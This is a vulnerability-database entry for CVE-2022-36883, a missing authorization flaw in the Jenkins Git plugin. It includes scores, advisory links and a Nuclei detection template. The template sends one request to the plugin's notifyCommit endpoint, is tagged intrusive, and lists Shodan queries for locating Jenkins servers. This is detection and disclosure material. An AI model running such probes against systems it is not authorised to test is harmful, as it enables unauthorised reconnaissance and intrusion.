Jenkins Git <=4.11.3 - Missing Authorization

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType

Jenkins Git plugin <=4.11.3 Missing Authorization - Unauthorized acces

Reporter	Title	Published	Views	Family All 32
ATTACKERKB	CVE-2022-36883	27 Jul 202215:15	–	attackerkb
AlpineLinux	CVE-2022-36883	27 Jul 202214:21	–	alpinelinux
BDU FSTEC	The vulnerability of the Build Handler component of the Jenkins Git plugin, related to authentication errors, allows a hacker to circumvent established security restrictions and gain increased privileges.	9 Sep 202200:00	–	bdu_fstec
Circl	CVE-2022-36883	16 Jan 202406:27	–	circl
Tenable Nessus	Jenkins Enterprise and Operations Center 2.303.x < 2.303.30.0.15 / 2.346.2.3 Multiple Vulnerabilities (CloudBees Security Advisory 2022-07-27)	7 Oct 202200:00	–	nessus
Tenable Nessus	RHEL 8 : OpenShift Container Platform 4.8.56 (RHSA-2023:0017)	28 Apr 202400:00	–	nessus
Tenable Nessus	RHEL 8 : OpenShift Container Platform 4.10.51 (RHSA-2023:0560)	28 Apr 202400:00	–	nessus
Tenable Nessus	RHEL 8 : OpenShift Container Platform 4.9.56 (RHSA-2023:0777)	23 Apr 202400:00	–	nessus
Tenable Nessus	RHCOS 4 : OpenShift Container Platform 4.8.56 (RHSA-2023:0017)	24 Jan 202400:00	–	nessus
Tenable Nessus	RHCOS 4 : OpenShift Container Platform 4.10.51 (RHSA-2023:0560)	24 Jan 202400:00	–	nessus

Source	Link
jenkins	www.jenkins.io/security/advisory/2022-07-27/
cve	www.cve.mitre.org/cgi-bin/cvename.cgi
nvd	www.nvd.nist.gov/vuln/detail/CVE-2022-36883
openwall	www.openwall.com/lists/oss-security/2022/07/27/1
github	www.github.com/StarCrossPortal/scalpel

id: CVE-2022-36883

info:
  name: Jenkins Git <=4.11.3 - Missing Authorization
  author: c-sh0
  severity: high
  description: Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive data and unauthorized actions being performed on the Jenkins Git plugin.
  remediation: |
    Upgrade to a fixed version of the Jenkins Git plugin (>=4.11.4) or apply the provided patch to mitigate the vulnerability.
  reference:
    - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36883
    - http://www.openwall.com/lists/oss-security/2022/07/27/1
    - https://github.com/StarCrossPortal/scalpel
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-36883
    cwe-id: CWE-862
    epss-score: 0.05454
    epss-percentile: 0.91738
    cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: jenkins
    product: git
    framework: jenkins
    shodan-query:
      - X-Jenkins
      - x-jenkins
  tags: cve,cve2022,jenkins,plugin,git,intrusive,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "repository:"
          - SCM API plugin
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205b763ae26a49acb1c90d67bcb99ead5f5bb1164519495d0820a6f97c6a41d513022100fcd6d9dc654c45fe1873df2d424de2fc95f3ca6f9bec91b48f8a88909e192dc8:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6.8Medium risk

Vulners AI Score6.8

CVSS 3.17.5

EPSS0.05454